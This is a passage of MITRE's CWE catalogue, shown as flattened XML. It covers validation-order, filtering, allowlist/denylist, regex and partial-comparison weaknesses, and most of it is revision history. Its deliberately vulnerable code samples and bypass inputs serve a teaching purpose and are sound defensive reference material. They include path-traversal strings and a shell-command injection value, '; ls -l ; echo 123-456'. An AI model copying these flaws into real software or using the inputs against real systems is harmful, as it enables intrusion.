Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples, Potential_Mitigations, Relationships - - Early Validation Errors - - - - The software validates input before it is canonicalized, which prevents the software from detecting data that becomes invalid after the canonicalization step. - This can be used by an attacker to bypass the validation and launch attacks that expose weaknesses that would otherwise be prevented, such as injection. - - - - - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - The following code attempts to validate a given input path by checking it against an allowlist and then return the canonical path. In this specific case, the path is considered valid if it starts with the string "/safe_dir/". - - String path = getInputPath();if (path.startsWith("/safe_dir/")){File f = new File(path);return f.getCanonicalPath();} - - The problem with the above code is that the validation step occurs before canonicalization occurs. An attacker could provide an input path of "/safe_dir/../" that would pass the validation step. However, the canonicalization process sees the double dot as a traversal to the parent directory and hence when canonicized the path would become just "/". - To avoid this problem, validation should occur after canonicalization takes place. In this case canonicalization occurs during the initialization of the File object. The code below fixes the issue. - - String path = getInputPath();File f = new File(path);if (f.getCanonicalPath().startsWith("/safe_dir/")){return f.getCanonicalPath();} - - - - - - - - CVE-2002-0433 - Product allows remote attackers to view restricted files via an HTTP request containing a "*" (wildcard or asterisk) character. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0433 - - - CVE-2003-0332 - Product modifies the first two letters of a filename extension after performing a security check, which allows remote attackers to bypass authentication via a filename with a .ats extension instead of a .hts extension. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0332 - - - CVE-2002-0802 - Database consumes an extra character when processing a character that cannot be converted, which could remove an escape character from the query and make the application subject to SQL injection attacks. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0802 - - - CVE-2000-0191 - Overlaps "fakechild/../realchild" - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0191 - - - CVE-2004-2363 - Product checks URI for "<" and other literal characters, but does it before hex decoding the URI, so "%3E" and other sequences are allowed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2363 - - - - - Validate-Before-Canonicalize - - - A1 - Unvalidated Input - CWE More Specific - - - IDS01-J - Normalize strings before validating them - Exact - - - IDS01-J - Normalize strings before validating them - Exact - - - - - - - - - - - - This overlaps other categories. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-05-27 - updated Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Functional_Areas - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Demonstrative_Examples, Potential_Mitigations - - Validate-Before-Canonicalize - - - - The software validates data before it has been filtered, which prevents the software from detecting data that becomes invalid after the filtering step. - This can be used by an attacker to bypass the validation and launch attacks that expose weaknesses that would otherwise be prevented, such as injection. - - - - - - - - - Validate-before-cleanse - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Implementation - Architecture and Design - Inputs should be decoded and canonicalized to the application's current internal representation before being filtered. - - - - - This script creates a subdirectory within a user directory and sets the user as the owner. - - function createDir($userName,$dirName){$userDir = '/users/'. $userName;if(strpos($dirName,'..') !== false){echo 'Directory name contains invalid sequence';return;} - //filter out '~' because other scripts identify user directories by this prefix - $dirName = str_replace('~','',$dirName);$newDir = $userDir . $dirName;mkdir($newDir, 0700);chown($newDir,$userName);} - - While the script attempts to screen for '..' sequences, an attacker can submit a directory path including ".~.", which will then become ".." after the filtering step. This allows a Path Traversal (CWE-21) attack to occur. - - - - - CVE-2002-0934 - Directory traversal vulnerability allows remote attackers to read or modify arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a ".." sequence. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0934 - - - CVE-2003-0282 - Directory traversal vulnerability allows attackers to overwrite arbitrary files via invalid characters between two . (dot) characters, which are filtered and result in a ".." sequence. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0282 - - - - Protection Mechanism - - - - Validate-Before-Filter - - - A1 - Unvalidated Input - CWE More Specific - - - - - - - - - - - - - This category is probably under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Functional_Areas, Relationships, Research_Gaps, Taxonomy_Mappings, Type - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Observed_Examples - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - Validate-before-filter - - - - The software filters data in a way that causes it to be reduced or "collapsed" into an unsafe value that violates an expected security property. - - - - - - - - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Architecture and Design - Input Validation - Avoid making decisions based on names of resources (e.g. files) if those resources can have alternate names. - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - Canonicalize the name to match that of the file system's representation of the name. This can sometimes be achieved with an available API (e.g. in Win32 the GetFullPathName function). - - - - - CVE-2004-0815 - "/.////" in pathname collapses to absolute path. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0815 - - - CVE-2005-3123 - "/.//..//////././" is collapsed into "/.././" after ".." and "//" sequences are removed. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3123 - - - CVE-2002-0325 - ".../...//" collapsed to "..." due to removal of "./" in web server. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0325 - - - CVE-2002-0784 - chain: HTTP server protects against ".." but allows "." variants such as "////./../.../". If the server removes "/.." sequences, the result would collapse into an unsafe value "////../" (CWE-182). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0784 - - - CVE-2005-2169 - MFV. Regular expression intended to protect against directory traversal reduces ".../...//" to "../". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169 - - - CVE-2001-1157 - XSS protection mechanism strips a <script> sequence that is nested in another <script> sequence. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1157 - - - - - Collapse of Data into Unsafe Value - - - IDS11-J - Eliminate noncharacter code points before validation - - - - - - - Overlaps regular expressions, although an implementation might not necessarily use regexp's. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Relationship_Notes, Relevant_Properties, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Observed_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Relevant_Properties - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - - - - The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses. - - - - - - - Primary - - - - - - - - Allowlist / Allow List - This is used by CWE and CAPEC instead of other commonly-used terms. Its counterpart is denylist. - - - Safelist / Safe List - This is often used by security tools such as firewalls, email or web gateways, proxies, etc. - - - Whitelist / White List - This term is frequently used, but usage has been declining as organizations have started to adopt other terms. - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - CVE-2019-12799 - chain: bypass of untrusted deserialization issue (CWE-502) by using an assumed-trusted class (CWE-183) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12799 - - - CVE-2019-10458 - sandbox bypass using a method that is on an allowlist - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10458 - - - CVE-2017-1000095 - sandbox bypass using unsafe methods that are on an allowlist - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000095 - - - CVE-2019-10458 - CI/CD pipeline feature has unsafe elements in allowlist, allowing bypass of script restrictions - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10458 - - - CVE-2017-1000095 - Default allowlist includes unsafe methods, allowing bypass of sandbox - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-1000095 - - - - - Permissive Whitelist - - - - - - - - - - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Alternate_Terms, Description, Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Alternate_Terms, Observed_Examples - - Permissive Whitelist - - - - The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are not allowed by policy or otherwise require other action to neutralize before additional processing takes place, but the list is incomplete, leading to resultant weaknesses. - Developers often try to protect their products against malicious input by performing tests against inputs that are known to be bad, such as special characters that can invoke new commands. However, such lists often only account for the most well-known bad inputs. Attackers may be able to find other malicious inputs that were not expected by the developer, allowing them to bypass the intended protection mechanism. - - - - - - - - - - - Primary - - - - - - - - Denylist / Deny List - This is used by CWE and CAPEC instead of other commonly-used terms. Its counterpart is allowlist. - - - Blocklist / Block List - This is often used by security tools such as firewalls, email or web gateways, proxies, etc. - - - Blacklist / Black List - This term is frequently used, but usage has been declining as organizations have started to adopt other terms. - - - - - Implementation - Developers might begin to develop a list of bad inputs as a fast way to fix a particular weakness, instead of fixing the root cause. See [REF-141]. - - - Architecture and Design - The design might rely solely on detection of malicious inputs as a protection mechanism. - - - - - Access Control - Bypass Protection Mechanism - - - - - Black Box - Exploitation of a vulnerability with commonly-used manipulations might fail, but minor variations might succeed. - - - - - Implementation - Input Validation - Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs. - - - - - The following code attempts to stop XSS attacks by removing all occurences of "script" in an input string. - - public String removeScriptTags(String input, String mask) {return input.replaceAll("script", mask);} - - Because the code only checks for the lower-case "script" string, it can be easily defeated with upper-case script tags. - - - - - CVE-2008-2309 - product uses a denylist to identify potentially dangerous content, allowing attacker to bypass a warning - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2309 - - - CVE-2005-2782 - PHP remote file inclusion in web application that filters "http" and "https" URLs, but not "ftp". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2782 - - - CVE-2004-0542 - Programming language does not filter certain shell metacharacters in Windows environment. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0542 - - - CVE-2004-0595 - XSS filter doesn't filter null characters before looking for dangerous tags, which are ignored by web browsers. MIE and validate-before-cleanse. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0595 - - - CVE-2005-3287 - Web-based mail product doesn't restrict dangerous extensions such as ASPX on a web server, even though others are prohibited. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3287 - - - CVE-2004-2351 - Resultant XSS when only <script> and <style> are checked. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2351 - - - CVE-2005-2959 - Privileged program does not clear sensitive environment variables that are used by bash. Overlaps multiple interpretation error. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2959 - - - CVE-2005-1824 - SQL injection protection scheme does not quote the "\" special character. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1824 - - - CVE-2005-2184 - Detection of risky filename extensions prevents users from automatically executing .EXE files, but .LNK is accepted, allowing resultant Windows symbolic link. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2184 - - - CVE-2007-1343 - Product uses list of protected variables, but accidentally omits one dangerous variable, allowing external modification - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1343 - - - CVE-2007-5727 - Chain: product only removes SCRIPT tags (CWE-184), enabling XSS (CWE-79) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727 - - - CVE-2006-4308 - Chain: product only checks for use of "javascript:" tag (CWE-184), allowing XSS (CWE-79) using other tags - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308 - - - CVE-2007-3572 - Chain: OS command injection (CWE-78) enabled by using an unexpected character that is not explicitly disallowed (CWE-184) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3572 - - - CVE-2002-0661 - "\" not in list of disallowed values for web server, allowing path traversal attacks when the server is run on Windows and other OSes. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0661 - - - - - Incomplete Blacklist - - - - - - - - - - - - - - - - - - - - - Multiple interpretation errors can indirectly introduce inputs that should be disallowed. For example, a list of dangerous shell metacharacters might not include a metacharacter that only has meaning in one particular shell, not all of them; or a check for XSS manipulations might ignore an unusual construct that is supported by one web browser, but not others. - - - - - PLOVER - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Detection_Factors, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Observed_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Description, Other_Notes, Relationship_Notes, Time_of_Introduction - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2013-02-21 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-05-03 - updated Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, References - - - CWE Content Team - MITRE - 2018-03-27 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Alternate_Terms, Description, Detection_Factors, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Alternate_Terms, Observed_Examples - - Incomplete Blacklist - - - - The software specifies a regular expression in a way that causes data to be improperly matched or compared. - When the regular expression is used in protection mechanisms such as filtering or validation, this may allow an attacker to bypass the intended restrictions on the incoming data. - - - - - - - - - - - Implementation - - - - - Other - Unexpected State - Varies by Context - When the regular expression is not correctly specified, data might have a different format or type than the rest of the program expects, producing resultant weaknesses or errors. - - - Access Control - Bypass Protection Mechanism - In PHP, regular expression checks can sometimes be bypassed with a null byte, leading to any number of weaknesses. - - - - - Architecture and Design - Refactoring - Regular expressions can become error prone when defining a complex language even for those experienced in writing grammars. Determine if several smaller regular expressions simplify one large regular expression. Also, subject the regular expression to thorough testing techniques such as equivalence partitioning, boundary value analysis, and robustness. After testing and a reasonable confidence level is achieved, a regular expression may not be foolproof. If an exploit is allowed to slip through, then record the exploit and refactor the regular expression. - - - - - The following code takes phone numbers as input, and uses a regular expression to reject invalid phone numbers. - - $phone = GetPhoneNumber();if ($phone =~ /\d+-\d+/) { - # looks like it only has hyphens and digits - system("lookup-phone $phone");} - else {error("malformed number!");} - - An attacker could provide an argument such as: "; ls -l ; echo 123-456" This would pass the check, since "123-456" is sufficient to match the "\d+-\d+" portion of the regular expression. - - - - - CVE-2002-2109 - Regexp isn't "anchored" to the beginning or end, which allows spoofed values that have trusted values as substrings. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2109 - - - CVE-2005-1949 - Regexp for IP address isn't anchored at the end, allowing appending of shell metacharacters. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1949 - - - CVE-2001-1072 - Bypass access restrictions via multiple leading slash, which causes a regular expression to fail. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1072 - - - CVE-2000-0115 - Local user DoS via invalid regular expressions. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0115 - - - CVE-2002-1527 - chain: Malformed input generates a regular expression error that leads to information exposure. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1527 - - - CVE-2005-1061 - Certain strings are later used in a regexp, leading to a resultant crash. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1061 - - - CVE-2005-2169 - MFV. Regular expression intended to protect against directory traversal reduces ".../...//" to "../". - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2169 - - - CVE-2005-0603 - Malformed regexp syntax leads to information exposure in error message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0603 - - - CVE-2005-1820 - Code injection due to improper quoting of regular expression. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1820 - - - CVE-2005-3153 - Null byte bypasses PHP regexp check. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3153 - - - CVE-2005-4155 - Null byte bypasses PHP regexp check. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4155 - - - - - Regular Expression Error - - - - - - - - - - - - While there is some overlap with allowlist/denylist problems, this entry is intended to deal with incorrectly written regular expressions, regardless of their intended use. Not every regular expression is intended for use as an allowlist or denylist. In addition, allowlists and denylists can be implemented using other mechanisms besides regular expressions. - Regexp errors are likely a primary factor in many MFVs, especially those that require multiple manipulations to exploit. However, they are rarely diagnosed at this level of detail. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Name, Relationships, Observed_Example, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-12-28 - updated Common_Consequences, Other_Notes - - - CWE Content Team - MITRE - 2010-02-16 - updated References - - - CWE Content Team - MITRE - 2010-04-05 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Observed_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Applicable_Platforms, Common_Consequences, Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated References - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns, Relationships, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships, Type - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationship_Notes - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Regular Expression Error - - - - A regular expression is overly restrictive, which prevents dangerous values from being detected. - This weakness is not about regular expression complexity. Rather, it is about a regular expression that does not match all values that are intended. Consider the use of a regexp to identify acceptable values or to spot unwanted terms. An overly restrictive regexp misses some potentially security-relevant values leading to either false positives *or* false negatives, depending on how the regexp is being used within the code. Consider the expression /[0-8]/ where the intention was /[0-9]/. This expression is not "complex" but the value "9" is not matched when maybe the programmer planned to check for it. - - - - - - - - - - - Implementation - - - - - Access Control - Bypass Protection Mechanism - - - - - Implementation - Regular expressions can become error prone when defining a complex language even for those experienced in writing grammars. Determine if several smaller regular expressions simplify one large regular expression. Also, subject your regular expression to thorough testing techniques such as equivalence partitioning, boundary value analysis, and robustness. After testing and a reasonable confidence level is achieved, a regular expression may not be foolproof. If an exploit is allowed to slip through, then record the exploit and refactor your regular expression. - - - - - CVE-2005-1604 - MIE. ".php.ns" bypasses ".php$" regexp but is still parsed as PHP by Apache. (manipulates an equivalence property under Apache) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1604 - - - - - Overly Restrictive Regular Expression - - - - Can overlap allowlist/denylist errors (CWE-183/CWE-184) - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2019-01-03 - updated Description - - - CWE Content Team - MITRE - 2020-02-24 - updated Description, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationship_Notes - - - - - The software performs a comparison that only examines a portion of a factor before determining whether there is a match, such as a substring, leading to resultant weaknesses. - For example, an attacker might succeed in authentication by providing a small password that matches the associated portion of the larger, correct password. - - - - - - Primary - - - - - - - - Implementation - - - - - Integrity - Access Control - Alter Execution Logic - Bypass Protection Mechanism - - - - - Testing - Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing. - - - - - This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded. - - - - /* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */ - - char *username = "admin";char *pass = "password"; - int AuthenticateUser(char *inUser, char *inPass) {if (strncmp(username, inUser, strlen(inUser))) {logEvent("Auth failure of username using strlen of inUser");return(AUTH_FAIL);}if (! strncmp(pass, inPass, strlen(inPass))) {logEvent("Auth success of password using strlen of inUser");return(AUTH_SUCCESS);}else {logEvent("Auth fail of password using sizeof");return(AUTH_FAIL);}} - int main (int argc, char **argv) { - int authResult; - if (argc < 3) {ExitError("Usage: Provide a username and password");}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {DoAuthenticatedTask(argv[1]);}else {ExitError("Authentication failed");} - } - - In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application's password before determining success. - As a result, this partial comparison leads to improper authentication (CWE-287). - Any of these passwords would still cause authentication to succeed for the "admin" user: - - ppapaspass - - This significantly reduces the search space for an attacker, making brute force attacks more feasible. - The same problem also applies to the username, so values such as "a" and "adm" will succeed for the username. - While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness. - - - - - CVE-2014-6394 - Product does not prevent access to restricted directories due to partial string comparison with a public directory - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6394 - - - CVE-2004-1012 - Argument parser of an IMAP server treats a partial command "body[p" as if it is "body.peek", leading to index error and out-of-bounds corruption. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1012 - - - CVE-2004-0765 - Web browser only checks the hostname portion of a certificate when the hostname portion of the URI is not a fully qualified domain name (FQDN), which allows remote attackers to spoof trusted certificates. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0765 - - - CVE-2002-1374 - One-character password by attacker checks only against first character of real password. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1374 - - - CVE-2000-0979 - One-character password by attacker checks only against first character of real password. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0979 - - - - - Partial Comparison - - - - This is conceptually similar to other weaknesses, such as insufficient verification and regular expression errors. It is primary to some weaknesses. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Description, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Observed_Examples, Other_Notes, Relationship_Notes - - - CWE Content Team - MITRE - 2011-03-29 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2018-03-27 - updated Name, Observed_Examples, Relationships, Type - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 